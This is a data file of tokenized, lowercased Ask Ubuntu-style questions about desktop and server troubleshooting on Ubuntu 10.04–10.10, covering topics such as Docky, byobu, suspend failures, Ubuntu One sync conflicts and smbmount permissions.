17029	gnomenu integration in docky	posting the error : running docky -- debug < ... some other stuff ... > [ info 10:27:52.535 ] [ helper ] starting gnomenu.py [ info 10:27:52.560 ] [ helperservice ] helper added : /usr/share/dockmanager/scripts/gnomenu.py [ info 10:27:52.757 ] [ helper ] gnomenu.py : : no module named dockmanager.dockmanager [ info 10:27:52.758 ] [ helper ] gnomenu.py : : gconf backend [ info 10:27:52.758 ] [ helper ] gnomenu.py : : 239 [ error 10:27:52.759 ] [ helper ] gnomenu.py : : traceback ( most recent call last ) : [ error 10:27:52.759 ] [ helper ] gnomenu.py : : file `` /usr/share/dockmanager/scripts/gnomenu.py '' , line 120 , in < module > [ error 10:27:52.759 ] [ helper ] gnomenu.py : : class dockygnomenuitem ( dockmanageritem ) : [ error 10:27:52.759 ] [ helper ] gnomenu.py : : nameerror : name 'dockmanageritem ' is not defined [ info 10:27:52.874 ] [ helper ] gnomenu.py has exited ( code 1 ) . after installing dockmanager now this is what happens : [ info 11:34:36.166 ] [ helper ] gnomenu.py : : gconf backend [ info 11:34:36.166 ] [ helper ] gnomenu.py : : 136 [ info 11:34:36.166 ] [ helper ] gnomenu.py : : dockmanagersink ( ) : system.notsupportedexception : can not send null variant [ info 11:34:36.210 ] [ helper ] gnomenu.py has exited ( code 0 ) . i tried to click the icon at the dock : gconf backend 380 dockmanagersink ( ) : system.notsupportedexception : can not send null variant gconf backend 380 dockmanagersink ( ) : system.notsupportedexception : can not send null variant how can i fix this ? thanks for your prompt answer !
17030	desktop byobu launcher does n't read my ~/.byobu/windows.ssh_sessions file	any idea why the desktop launcher `` gnome-terminal -x byobu '' does n't read my ~/.byobu/windows.ssh_sessions ? here 's my ~/.byobu/windows.ssh_sessions file i use with byobu successfully : screen -t ubu-mysql ssh master @ 192.168.1.3 screen -t ubu-alfresco ssh master @ 192.168.1.4 screen -t ubu-master ssh master @ 192.168.1.5 screen -t ubu-zimbra ssh master @ 192.168.1.6 screen -t ubu-sugarcrm ssh master @ 192.168.1.7 screen -t ubu-efront ssh master @ 192.168.1.8 and here 's the variable entry from my .bashrc : export byobu_windows=/home/jj/.byobu/windows.ssh_sessions byobu i tried it in .profile also , no love . thanks for your time .
17031	is there a way to enable commenting adobe pdf ?	i have a pdf file , and i 'd like to comment in adobe style . is there a way to enable that somehow , or are there any alternatives ?
17035	how can i set a second screen ( display=:0.1 ) as the default gnome display ?	due to various reasons , i have my main monitor set as the secondary display in xorg.conf . i would like to have gnome initialize metacity , gnome-panel as running primarily on :0.1 , instead of :0.0 . is this possible at all ? to clarify , this is a laptop with its lcd turned off . my main monitor is connected to the vga out and is driven by the nouveau driver for nvidia ; a secondary monitor is on a displaylink usb-vga donverter . the seconday monitor is set in xorg.conf as the primary display ( no way around it ) . i can do things like display=:0.1 gnome-terminal to run applications on the main monitor . my question is whether it is possible to do this ( gnome- ) system-wide .
17039	will there be a focus on creating a dockable on screen keyboard for unity ?	i have been looking for a couple of years for a clean , usable on screen keyboard for touchscreen interfaces for ubuntu , and most have fallen short . with the increase interest in tablets and netbooks , is a project for improvement on your radar ?
17042	file not found in places menu	when i go to the places menu and click on home or any other folder except network , i get error file not found popup box . i can open these folder from short cuts on the desktop and they work fine . i have tried changing the file association to file browser or nautalus as suggested on the ubuntu forums . they appears to have worked for other people but does not work for me . i 'm running ubuntu 10.04 how do i fix my places menu folders ?
17043	are there affordable and recognised ubuntu/debian online certification courses/exams ?	i like ubuntu ( on a server as well as on a client ) and debian and am interested in getting ubuntu/debian-related job . so i look forward to get certified to enrich my cv . but the options i 've found in canonical eshop are too expensive for me , the most interesting one `` deploying ubuntu server edition '' even costs âł1010.54 - an enormous price for me ( it 's near my half-year income , as i am a sysadmin freelancer in an east european country ) . are there cheaper ways to get certified ? i can hardly invest more than âź100 in this , but have got some experience already and supposedly can prepare myself . i 'd prefer a 100 % on-line way .
17044	upgrading to 10.10 causes mountall error in parallels	i just recently upgraded from 10.04 to 10.10 using the update manager tool . after the upgrade , i was asked to reboot and it fails with an error occurred while mounting /media/psf press s to skip mounting or m for manual recovery skipping gives me this : logging in with the command line prompt does n't bring me to the ui , but stays in terminal mode . i would appreciate next steps to resolving this situation . i am running ubuntu on a parallels 5 vm . a reboot using recovery mode ends the same way but with this screen i also ran into a mention of mountall having an error , but i 'm having trouble replicating the screen at the moment :
17047	in htop , i sometimes see lists of 64 processes , identical for all but the pid . what are they ?	i 've noticed this situation several times ( but i 'm not sure if it is always the same command ) . i do n't even know how to describe the lead-up to this situation , unless it is because of a detached script i 've been testing which has n't terminated properly ... the best i can do is present this image of htop ( tree view ) ... i 've only shown the first few . there is a total of 63 subordinate entries ( plus the 1 parent ) ... and t hey just sit there ! i 'd like to know what is going on ? ... and is the `` 64 '' some kind of limit ? whatever the case , it just seems bizzare to have 64 threads/processes `` running '' update : i 've just rebooted the system , and this time , the first thing i did was to check htop ... console-kit-daemon shows 63 threads ... so it looks like this may be a normal situation ... it still seems a bit strange to me ... does anyone know why there are so many threads for console-kit-daemon ?
17052	comparison of dpkg/apt/aptitude/ubuntu software centre/synaptic package manager	what are the pros and cons of dpkg apt aptitude ubuntu software centre synaptic package manager when used to install , remove and update software ?
17054	how to use keyboard keys as mouse buttons ?	on asus eee pc 1005px , the mouse buttons are pretty stiff . so , i want to use the windows key and the menu key on the keyboard as left and right mouse buttons respectively . is it possible to achieve this ?
17056	overwrote /bin/bash , after replacing still broken	i use ubuntu 10.10 . i abused sudo and accidentally overwrote my /bin/bash file via a typo , so i booted to the livecd and restored my copy with a `` good '' one from the ubuntu 10.10 liveos . this did not fix the problem . explanation : bash no longer works in gnome-terminal . no longer shows username @ computername in prompt , just shows $ sign keyboard shortcuts no longer work- tab , arrow keys , etc . all insert codes now . aliases , also a function of bash , do not work . any help on this ? where do i start ? i 'd rather learn how to fix this instead of just reinstalling the os . thanks ! i tried to reinstall bash via terminal with sudo apt-get -f install bash but i ca n't even get it to install with the -f ( force ) parameter . i get this error : errors were encountered while processing : /var/cache/apt/archives/bash_4.1-2ubuntu4_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) p.s . once i get aliases working again , i 'm aliasing `` cp '' to `` cp -i '' and `` mv '' to `` mv -i '' .
17062	how to open a directory/folder and a url through terminal	i can navigate my files quite fast through terminal . faster than double clicking ... open ... look , double click ... etc . how do i open a directory in the ubuntu gui ? for example : cd projects { some cmd } client_project then voila , it opens in the ubuntu gui as if i navigated manually ? also , how can i open a url in my default browser via terminal . it 'd be awesome to go : f12 open http : //google.com and chrome opens it up .
17070	why is natty 's daily live build not updated daily anymore ?	i thought the daily build on http : //cdimage.ubuntu.com/daily-live/current/ would be updated daily , but the current build is 6 days old . i would love to try out natty and compiz unity on a live usb-drive , but it 's not much use if it 's not updated . any reason why the build is so old ? does anybody know when it will be updated again ?
17071	is acrobat reader x coming to ubuntu ?	do we know when adobe release x reader for ubuntu ? it has some good features !
17072	dynamic /etc/resolv.conf file ?	i have several ubuntu servers . two of them are working as dns servers . one of my name servers ( let 's call it dns1 ) went down for maintenance . i sill had another dns server running ( dns2 ) . all other servers are configured to use the nameservers as follows /etc/resolv.conf : nameserver dns1 nameserver dns2 i can still resolve dns names using the dns2 server , but the name resolution takes a long time . it is clear to me that any given server is first trying to access dns1 , and then it is trying dns2 after failure . i tried to swap the two lines . the name resolution became too fast . i am wondering if there is a way to dynamically change the resolv.conf file based on the state of the configured nameservers . of course , i can write a shell script myself to do the job . but i prefer to find a better way if there is one .
17074	dual monitor unity launcher opening on wrong monitor	is this a specific unity configuration or a dual monitor configuration problems ? in nvidia x server settings . make this the primary display for the x screen , is my choice the middle display . but the launcher is on the left display .
17075	easy database tool ( the more gui the better )	so a friend of mine wants to set up a database for managing his investigation data . but he does not know any programming . so i offered a little help but also want to make sure that he could manage his stuff for when i am not around . basically i am looking for a database application that would be somewhat comparable to microsoft access , meaning i can setup the database and some forms . i know i could set up mysql and http server , but i am looking for a solution that has the most gui possible and is not dependent on servers so he could move the database easily to another workstation . what would you recommend dear ubuntu fellows ?
17077	computer wo n't sleep	when i try to put my ubuntu 10.10 box to sleep or into hibernation , it appears to wake up right away ( couple of seconds at most ) . i am trying to figure out what 's going on , and would appreciate any suggestions . syslog says : dec 12 13:15:25 mig kernel : [ 13049.728355 ] pm_op ( ) : usb_dev_suspend+0x0/0x20 returns -2 dec 12 13:15:25 mig kernel : [ 13049.728357 ] pm : device usb3 failed to suspend async : error -2 dec 12 13:15:25 mig kernel : [ 13049.728451 ] pm : some devices failed to suspend now , how do i find out which device is usb3 and why it 's failing to suspend ? the only external usb device in the system is a dongle for wireless keyboard and mouse . if i disconnect it , ssh into the box and run pm-suspend , it still fails with exactly the same error message . lsusb gives : bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub so the setup is n't exactly extravagant . the mobo is asus p7p55d-e based on the p55 express chipset . edit it turns out usb3 was n't the name of a device but was a reference to the usb 3.0 protocol . if i disable the latter in the bios , the box can sleep ! this is cross-posted from superuser.com , since there are no answers there and the question is ubuntu-specific .
17079	what is grub ( 2 ) 's role in the suspend/hibernate process ?	i have , like many , problems with suspending/hibernating in ubuntu . when i resume from suspend the fans start , the hdd led glows steadily , but the screen is off . the only thing i do is hard reboot . no solution have work for me so far . but i have found a workaround : downgrade from grub 2 to legacy grub . with legacy grub i can suspend just fine . my suspend/hibernate problems are somehow related to grub 2 , but why ? what is grubs role in the suspend process ? where to start digging ? update i have now tried to disable graphical terminal in /etc/default/grub : # uncomment to disable graphical terminal ( grub-pc only ) grub_terminal=console that did not help . in /boot/grub/grub.cfg there is a function that concerns video : function load_video { insmod vbe < br / > insmod vga < br / > } i have no idea when , where or if it is called . maybe it is not relevant at all .
17080	enable networking in vmware	i just got myself an ubuntu 10.04 desktop cd . i pop it into my dvd drive ( on my laptop which has windows 7 ) , run vmware , install ubuntu using easy install . so far , so good . but , now , internet does not work in ubuntu desktop . how do i enable networking ( both connected and wireless ) . edit i do not know what happened or how it got fixed . but , it is now fixed . however , empathy im client does not work although , i am able to browse the internet ( which is what i wanted in the first place ! ) .
17084	how do i temporarily run an ftp server ?	in the world of ubuntu , it seems you either always run an ftp server or you never do . perhaps i 'm the first network analyst who 's needed to flash a cisco , checkpoint or nokia image using ubuntu ... i need an ftp server for maybe 5 minutes , no more than that . i 'm looking for a bare-bones , user-initiated ftp server . i understand that it would likely have to run with sudo . that 's fine - but i want to start/stop it like a normal program . on the windows platform , such tools are a dime a dozen - i 've used 3cdaemon for years and recently found coreftp . both are excellent . you configure a user , point it at a directory , then hit the `` start '' button . a couple of minutes later , you 're generally done and you hit the `` stop '' button . job done . such tools do n't seem to exist on ubuntu . i found a google code project that creates a tftp instance reasonably nicely ( assuming it still runs - i have n't used it in about a year and python has moved on ) , but how about ftp ? anything out there ?
17087	random images appearing in my home directory ... where are they coming from ?	here 's an odd problem i 've had for a while . every so often , i find that i have several jpeg images sitting in my home directory that i did n't put there . i 'm fairly sure this is n't a security breach but rather , there 's something writing these files in there that i 've forgotten about . here 's what i 'm looking at today : oli @ bert : ~ $ ls -l *.jpg -rw -- -- -- - 1 oli oli 8061 2010-11-19 18:30 an-alien-from-mars-attack-002.jpg -rw -- -- -- - 1 oli oli 24362 2010-11-19 18:30 an-alien-from-mars-attack-006.jpg -rw -- -- -- - 1 oli oli 8147 2010-11-05 18:08 avatar-film -- -2009-002.jpg -rw -- -- -- - 1 oli oli 35602 2010-11-05 18:08 avatar-film -- -2009-006.jpg -rw -- -- -- - 1 oli oli 6058 2010-12-03 18:42 britney-spears-victim-of -- 002.jpg -rw -- -- -- - 1 oli oli 28330 2010-12-03 18:42 britney-spears-victim-of -- 006.jpg -rw -- -- -- - 1 oli oli 8135 2010-11-12 19:19 charlie-brooker-twitter-p-002.jpg -rw -- -- -- - 1 oli oli 22115 2010-11-12 19:19 charlie-brooker-twitter-p-006.jpg -rw -- -- -- - 1 oli oli 8059 2010-10-29 18:47 leonardo-dicaprio-002.jpg -rw -- -- -- - 1 oli oli 29988 2010-10-29 18:47 leonardo-dicaprio-006.jpg -rw -- -- -- - 1 oli oli 8064 2010-10-22 16:41 spot-the-difference-.-.-.-002.jpg -rw -- -- -- - 1 oli oli 29188 2010-10-22 16:41 spot-the-difference-.-.-.-006.jpg they all seem like they 're tv or film related ... but i honestly do n't have a clue what could be writing them . they do n't bother me enough to go on a full-scale witch hunt but if anybody knows of something that writes images in the home directory like this , please let me know .
17094	automounter -- browsing with nautilus	i have a nas box that i automount several shares on my laptop . the shares are mounted to /mnt/nas/music , /mnt/nas/photos , etc . when i browse /mnt/nas in nautilus , no directories show up unless i go to the location bar and type in the directory name of the mounted share . is this how autofs works , or should there be directories that always appear , and then when you try to access their contents , autofs will mount the remote share ? thanks a bunch .
17097	how to backup/restore the host key in ssh server	i have a ssh server , and some clients have login it via key login . so the host identity of server has been stored in the known_host of clients . i want to reinstall the server , but i hope it never impact the experience of client . i 'm wondering whether it 's possible to backup the host identity of server , then restore it .
17098	how to install evince 2.32 ?	i would like to install evince 2.32 in lucid ( 10.04 ) is there any safe way to do it ? download the source and start install all the required dependences is this approach dangerous for the stability of my system ? i googled for a solution of this problem and the only suggestion i found it was to add the ppa : irie/evince . i guess this is a not so safe am i right ? if so it is expected to work with lucid ?
17099	will the launcher use intellihide by default ?	i 've found unity 's new intellihide mode extremely useful , and would like to know if it 's planned to be set by default or , by the contrary , the panel will be shown unless you set it manually .
17100	gnome sound converter drops all tags except for title & artist	i use gnome sound converter to convert mp3 files to aac ( m4a ) files . conversion works but the tags are n't transferred except for `` artist '' & `` title '' . even the tag bitrate is missing causing all players to not show the quality of the sound file . what am i doing wrong ?
17101	no sound after pulseaudio reinstall	i encountered an audio bug and reported it on launchpad . there i was asked to reinstall pulseaudio . that sounded dangerous , so i tried it on a virtualbox virtual machine i had lying around . ( this vm had no sound problems at all ) . and indeed , after i did a naive sudo apt-get remove pulseaudio - > reboot - > sudo apt-get install pulseaudio , the vm has no sound any more . strangely , everything looks ok . there is nothing muted ( i unmuted every single playback chanel in alsamixer just in case ) . the driver for the sound card is recognized and loaded , aplay plays sound files without producing an error , and when i installed and opened pulseaudio volume meter , playing a sound resulted in the volume indicator changing with the sound . only there is nothing coming out of the loudspeakers . this is n't a hardware problem either , because the sound in the host system is functioning . i tried to configure pulseaudio as described on this page of the ubuntu wiki , but had no success . i am afraid to try the reinstall on my real system until i know how to do it without causing a problem . did i miss a configuration step somewhere ? should i have reinstalled in some other way ? both guest and host systems are ubuntu 10.10 64 bit .
17108	downloaded ubuntu iso always has wrong checksum ?	i have a problem when i try to download the maverick iso . after download i always get the wrong iso checksum with gtkhash ? i already tried from several locations provided via the ubuntu page but not succeeded . the hash should be 59d15a16ce90c8ee97fa7c211b7673a8 ubuntu-10.10-desktop-i386.iso i get 681689736dcdf7dc28384836eed6e55f or 9174d1e4767d2c3e5b365444d0c8a771 update : downloading the image via torrent seems more reliable than via http or ftp because of the internal torrent checksum tests
17111	ubuntu one says it 's always synchronizing	i opened the ubuntu once preference box to see if everything was `` up to date '' come to find that it 's still `` synchronizing '' after leaving the window open for three hours . when i execute u1sdtool -- status state : standoff connection : with user with network description : waiting for connection to end is_connected : true is_error : false is_online : false queues : idle is this it 's idle text - or is it trying really , really hard to get something synchronized ?
17112	how to enable socks 5 authentication in network proxy preferences	is there a way to add socks 5 authentication to the network proxy preferences dialog ? currently it supports only http authentication .
17113	no application to launch when plugging in ipod	i am running banshee 1.8.0 on a more-or-less vanilla meerkat installation . i was most pleased when i plugged in an old ipod nano and it just worked . however , when plugging in the ipod , nautilus/gnome asks for an application to handle the newly inserted ipod . the dialog presents no applications that can handle the device and allows no manual choice . i have reinstalled banshee with apt-get purge and also install -- reinstall but neither added an association . as before , when manually opened , banshee happily talks to the ipod , it just wo n't launch on plug . i suspect there is a missing association in gconf or something similar but i 'm not sure where this information lives .
17114	differences between official and community documentation ?	ubuntu provides official and community documentation . why create the two streams ? is the official documentation more trustworthy ? is the criteria to add to it more strict ?
17117	why ubuntu wiki runs on different software to other help sites ?	i 'm curious why ubuntu team wiki uses a different web interface to ubuntu documentaion .
17123	fresh install from within ubuntu without cd-rom or thumbdrive	suppose i am using ubuntu version x now . my usb port and optical disk drive are not working properly and i want to do a fresh install of ubuntu version y using the downloaded iso image . since i can not install using cd-rom or thumbdrive , is there any way to wipe out version x completely with version y ?
17125	testdrive equivalent for ubuntu server	every now and then i 'd like to play with a fresh minimal install of ubuntu ( to test sysadminish scripts , application install instructions , package dependency lists etc. ) . i 'd like to have a tool as simple to use as testdrive : pick a version ( say , 'maverick ' ) , run a command , get a shell in a new virtual machine . i 'd like that shell to be in the current terminal , rather than a new gui window that testdrive uses . setting up the new vm to accept ssh logins with my ssh public key is fine . i 'd like the vm to have network access out of the box ; nat to a virtual network interface is fine . why a vm ? chroots do n't really cut it : installing , say , apache in a chroot would fail because it would try to listen on port 80 , which is already taken . containers might work , though , if there are any that are supported by standard ubuntu kernels .
17131	smbmount returns `` operation not permitted ''	i use the smbfs tools package to mount my smb shares . i wrote a quick script to mount the share : # ! /bin/sh /usr/bin/smbmount `` \\\\somehost.local\\hostshare '' /media/hostshare -o user=smbuser , dom=workgroup , uid=localuser , gid=localgroup this script used to work in 9.10 when called by the `` localuser '' account , but in my fresh-installed 10.04 it fails giving me the error : mount error ( 1 ) : operation not permitted refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) the /media/hostshare directory is empty and has these perms : drwxrwxr-x 2 localuser localgroup 4096 2010-12-12 12:04 hostshare/ the `` localuser '' is in these groups : localgroup adm dialout cdrom plugdev lpadmin admin sambashare any idea what is going on here ? google seems to suggest that the `` sticky '' bit needs to be set on /sbin/mount.cifs /sbin/mount.smbfs and /sbin/umount.cifs is this a bug ?
17132	distribution upgrade : what is likely to break ?	i 'd like to upgrade my distribution ( 10.04 to 10.10 ) and since i have customized ubuntu quite a bit , i was wondering what is likely to `` break '' . if that can help , here is a sample list of things that i have customized ( although i 'd like a general answer ) : gnome panel keyboard shortcuts sshd config apache + config nautilus ( added some plugins ) compiz config etc .
17134	rhythmbox still plays songs after exit	is there anyway to get rhythmbox to stop playing the current track when it closes without first pausing/stopping the song manually ?
17136	gnome terminal tabs ugly and oversized	both gnome terminal and terminator ( which i am using on my laptop these days ) can be customised to look very pretty . by using full screen and keeping desktop clutter down to a minimum it 's possible to get a good-sized area to work in , even on my little eeepc . however , there is one element that i do n't seem to be able to control . gnome 's tabs are massively oversized and ugly at best . they do n't fit into the theme at all which looks silly , but for me the biggest problem is the screen real estate that is wasted . on a small laptop screen in particular , it 's a real problem . is there a way to change these tabs ? i realize it 's possible to put them up the side of the window , but then they take up even more space ! if this is n't possible with theme-ing or gnome configuration , are there any terminal programs like terminator that can handle the tabs themselves ? ( ideally in a more elegant fashion ! )
17143	ca n't project using dlp infocus projector	i have compaq presariov200 , and when i plugin my infocus dlp projector to my laptop and press fn + f4 to activate the projector sometimes it works , but most of the times it does n't , after a few tries it projects , but most of the time i have to restart my laptop ... please help . thanks ...
17144	how can i become the owner of a file that origins from another pc / user ?	i have a file from another pc with ubuntu , the owner of the file is my user account from this pc . how do i change the owner to my useraccount on another pc so that i can use it ? when i try to change file permissons via nautilus i get the message you 're not the owner , that 's the reason you ca n't file permissions . but i 'm the owner just on another ubuntu with another account . do i first have to change the rights on the origin filesystem or can i take the rights somehow over ?
17151	accidentally skipped encryption dialog after installation . how to resume ?	during ubuntu installation i chose to encrypt my home folder . accidently after installation i skipped the dialog in ubuntu where i was asked to setup encryption ( choose key and so on ... ) how can i resume and complete the encryption process ? update : the encryption dialog box after installation just offers to show your passphrase for note it . enryption process after installation is fully completed with a random generated passphrase during installation .
17153	10.10 freezes totally	my maverick freezes constantly , no matter what i 'm doing . browsing with chromium or firefox , using cmus to play music , or copying 24 gb files from partition to partition while burning a cd , it will freeze , and only thing i can do is unplug it from the grid , no button will work . extra information : kern.log dmesg output any help appreciated ! if it 's hardware , so i can know what to do and what to backup : ) command `` sensors '' says : acpitz-virtual-0 adapter : virtual device temp1 : +40.0째c ( crit = +95.0째c ) k8temp-pci-00c3 adapter : pci adapter core0 temp : +24.0째c core1 temp : +24.0째c
17157	how do i stop the screen from being locked on suspend ?	on gnome the screen locks when i suspend , and i find that a bit annoying ( no one else in the house uses ubuntu anyway haha ) . what can i do to stop this ?
17166	why does my shell script hang without the .sh extension ?	i created a shell script /usr/local/bin/suspend with the following content : # ! /bin/sh # take an optional delay parameter if [ `` $ # '' -gt `` 0 '' ] ; then sleep `` $ 1 '' fi # put the system to sleep dbus-send -- system -- print-reply -- dest= '' org.freedesktop.hal '' \ /org/freedesktop/hal/devices/computer \ org.freedesktop.hal.device.systempowermanagement.suspend \ int32:0 if i chmod +x and run the script by invoking it directly ( e.g. , just typing suspend or /usr/local/bin/suspend on the command line ) , nothing happens and the shell hangs—it does n't even respond to ctrl-c ; i have to switch to a new shell and kill the bash process ( which has no apparent children ) . the script works fine if i invoke it in any of the following ways : using sh /usr/local/bin/suspend . using . /usr/local/bin/suspend . renaming it to suspend.sh and invoking /usr/local/bin/suspend.sh ( or just suspend.sh , since it 's in the path ) . the last option is fine , but still i wonder : what exactly is wrong with not using the .sh extension ?
17169	missing sound after cleanup and moving of home directory	first , i used ubuntu tweak 's clean up feature , so i may have accidentally removed something important through that ... so i just moved my home folder from the main partition to it 's own partition so that i do n't have to worry about it dieing if i change distros or upgrade distros . so the path i took was boot from live usb . opened gparted , shrink the main partition , create a new partition out of that . moved the current /home content to /home_backup . edited fstab to boot the new partition as home . i rebooted . i assumed the instructions i was working off of would work , but was a tad confused when through the instructions i never saw anything about copying the /home_backup to the /home directories . anyways , upon login i got lots of errors , and decided i should check out what went wrong . i rebooted into recovery mode and listed the contents of /home . nothing , so i copied /home_backup/don to /home ( cp -r ) . i rebooted and found that i did n't have ownership of the directory , so i opened the terminal and gave myself ownership ( chown don : don /home/don ) and rebooted again . this time when i logged in i found that everything was working , but i did n't have sound . so , as far as i can tell all of my apps are still working , and there are no other errors , but i ca n't play sound . the sound icon in my panel is just an empty , blank speaker ( i 'm using the faenza icons , the speaker icon is lighter than normal ) . if i attempt to mute/unmute or raise/lower the volume with my hardware keys , nothing happens . if i click on the icon and choose `` sound preferences '' i get an error saying `` waiting for sound system to respond '' . i have restarted the computer twice , i 've also reinstalled everything containing the word `` alsa '' through the synaptic manager . i would assume it 's missing a file , but i 'm not sure . right now i 've run a dist-update ( for different reasons ) , so i do n't know if that 'll have any effect on the problem .
17172	installing programs from a download	my name is anthony and i 'm new to ubuntu and any other linux os for that matter . my question concerns downloading a program , and then installing it . the program is called remotedroid , it lets you use your phone as a wireless keyboard and mouse . i 'm use to windows automatically starting setup upon download and cant figure out how to initiate the install in ubuntu . the programs website says its compatible with linux os and the readme file says to just click the extension remotedroidserver.jar to use , but it wont work and none of the files do anything . i 've unzipped all the files and my java is all up to date as far as i know , i think . i 'm just not getting how to run a setup in ubuntu . i looked around this site for the answer but came up with nothing so if someone could maybe offer some insight i would be grateful . thank you .
17173	install different versions of software	a particular software ( grass gis ) i need is available in two different versions - stable ( 6.4.0 ) and unstable ( 7.0 ) . stable one is available in ubuntu repository while developmental one can be installed from svn . my question is can i have both installed in same machine ? will it cause problems in operation ? later if i need to uninstall the svn installed version how can i do it ?
17177	error while opening tex files in gedit	i use 5.8.5 version of notepad++ . the .tex file that i have edited on notepad++ could not be opened on gedit . the error i get is `` character set could not be recognized ''
17178	execute command on wakeup	there is a bug in ubuntu that prevents bluetoothd from starting when the computers wakes up from hibernate . so far there is no solution . i am fed upstarting bluetoothd manually every time , i think a possible workaround may be to automatically do the following on waking up : check if bluetoothd is running . if it is not running , start it . i would appreciate if someone could give me an advice on how to implement that . which startup script executes when ubuntu wakes up from hibernate ? how to check if the daemon is running ?
17184	undelete ubuntu one files , deleted with reconnected pc	i just reinstalled ubuntu 10.10 with the same pc name as it was before . so after reconnecting to ubuntu one my files lost ( i think because in my new system folder which has ubuntu one synchronized files become empty after reinstall ) . how can i undelete these files ?
17186	how can i make chromium open apt links with xdg-open ?	hello i installed this extension because i want to open apt links clicked in chromium with xdg-open . i have looked at this help but have n't been successful . how can i acheive this ?
17187	disabling shutdown command for all users , even root - consequences ?	i would like to disable the shutdown command for all users , even root , on an ubuntu server installation . the reason i want to do this is to ensure that i do n't get into the habit of shutting down the machine in this way , as i ssh into a lot of production machines at the same time as this one , and i do n't want to accidentally shutdown one of the other machines by typing the command into the wrong window . the server i want do disable shutdown on only runs inside virtualbox on my windows desktop , and i only use it for local testing so it is not a problem if i ca n't shut it down from the command line . i have already mitigated the problem a bit by ensuring i have a different password on the virtualbox image , but obviously if i am within the sudo 'window ' on one of the production machines , i could still accidentally shut it down . my questions are : how do i disable the shutdown command ? if i do disable the shutdown command , are there any consequences that i should be made aware of ? most specifically , will it disable support for acpi shutdown that is the equivalent of pressing the power button on a physical machine ? could it affect other generic applications ? for information , i just use this virtualbox image for trying out shell scripts , running tomcat and java , and that kind of thing .
17190	numpad not working	i ca n't really understand why this is not working and maybe this is a bug , but it used to work as i rememeber and is working correctly under windows . i have 3 keyboard layouts in preferences , 1 the default for the keyboard ( norvegian ) plus english and romanian . is not working not even in the default one . i did not change anything lately except ubuntu updates . if you need some config from me just ask . thanks .
17193	.u1conflict suffix gets apended to files while using ubuntu one	i 'm using ubuntu one to synchronize a directory which i use to create and compile latex files . but , always , when a new file is generated , the files , instead of having the file-type extension like file1.pdf , they gain an extra suffix like file1.pdf.u1conflict , file1.pdf.u1conflict.1 so on . and many such files are generated when i compile pdflatex documents . ultimately it lead to an error , saying that a file is not found while compiling . and the actual reason is , that file has got a new extension , which is , .u1conflict .
17199	system hangs on changing time	my machine is always showing an hour ahead of the actual time . i am in texas currently but the time never picks day light savings . any time i click on set time ( top right corner ) , my system just hangs right there . i have to turn off the machine each time . how do i fix this issue ? this is what happens when i try ntpdate : still 1 hour difference . ntpdate time.nist.gov 13 dec 21:44:37 ntpdate [ 3098 ] : bind ( ) fails : permission denied sudo ntpdate time.nist.gov [ sudo ] password for ubuntu : ntpdate [ 3237 ] : step time server 192.43.244.18 offset - 12.151112 sec
17202	clean removal of kde 4	i recently installed kde in to my ubuntu 10.04 machine using apt . ( i.e apt-get install kde-desktop ) after a while i got enough with the testing and wanted to have gnome again . so i removed all the kde4 components on my system using synaptic package manager and everything that is associated with the kde desktop environment was deleted . ( or so that 's what i thought.. ) but after all that and a restart , the loading screen ( or the splash screen ) still shows 'kubuntu ' . and also when i 'm using gnome , apart from the legal ( gnome ) mouse pointer i should see , i see the kde mouse pointer . ( the oxygen theme one ) what was wrong with the way i removed kde and why i get to see remnants of a deleted desktop environment .
17207	numlock turned on on boot-up	i have a desktop running ubuntu 10.04 i want numlock to be turned on initially . what do i have to change to accomplish this ? ~~edit~~ i checked in my bios . it was already set up to have the numlock turned on initially . yet it is n't being turned on initially . i have a usb keyboard : would that break this functionality ? or , should i ask elsewhere ( superuser , perhaps ) about how to get that bois setting working properly ?
17209	empathy yahoo im contact request spam	i 'm getting maybe 20 friend requests from yahoo im everytime i start empathy ( or my internet goes up ) . is there any way i can deal with the contact spam that does n't involve me individually clicking on all the contact requests and dismissing them one by one ?
17211	how to send sftp file download to background ?	is it possible to : execute sftp command on remote machine and download a file ( ssh user @ machine , sftp user2 @ server , get file ) then , send download to background , so i can turn my local computer off
17213	how do i keep empathy new message notifications after a disconnect ?	when my internet connection goes down ( which happens rather frequently here ) and empathy disconnects it drops notifications for new messages . so if i have n't opened the conversation window , i will probably never notice a message someone has sent me that i did n't catch in time . is there a way for empathy to remind you of new messages even after disconnects ?
17216	how can i determine if just the .private folder is encrypted or the whole home directory ?	how can i determine if just the .private folder is encrypted or the whole home directory ?
17218	how can i adjust the time that automatically reduces the brightness of screen ?	at the moment it uses just a few seconds of inactivity after that ubuntu reduces the brightness of my screen . where do i find the option to increase this value ?
17220	can nautilus display a .desktop file by its real name ?	the ability of a .desktop file to display a `` human-readable '' alias rather than its ( perhaps ) clinical real name , has merit ... and as the .desktop filetype suggests , i assume that this ability is intended for the desktop ( which is ( co- ? ) managed by nautilus ) . however in the nautilus file manager itself , where i would expect to see the bare-bones file information ( eg . the real name ) , i am presented with the meta-data alias instead of the real filename . this makes it rather difficult to edit/view the .desktop file when nautilus does not make the real name available . is there some way to have nautilus gui file manager list these .desktop files by their real names ? ( just like ls ) ps.. these files had me completely puzzled until today , when i renamed one , and the ( my ) new `` name '' was actually not the new real filename at all ! . the displayed name was an alias ; nautilus had modified the file 's contents ( name= ... ) , and the original name was unchanged ! ... now i am only half-puzzled ( strange stuff )
17223	permissions problem when copying files to /usr/share/tomcat6	i am running springsource framework in ubuntu 10.01 . in my home folder , i have installed springsource ide . i have my tomcat6 appserver in the /usr/share/tomcat6 . while executing a sample project springapp , i have created the springapp dir in /users/share/tomcat6/webapps/ folder using sudo as i am unable to do it directly . on running the ant deploy or ant deploywar command , i am unable to copy the sample file -index.jsp from my workspace in springsource ide to springapp dir in /usr/share/tomcat6/webapps as i am getting the error permission denied while copying the .jsp file . can anybody please provide suggestion as to how to overcome this issue ? regards
17226	how do i show the date in the clock indicator ?	there is no gui way to show the date or the day ( or adjust the time format ) in unity 's indicator-datetime application in natty .
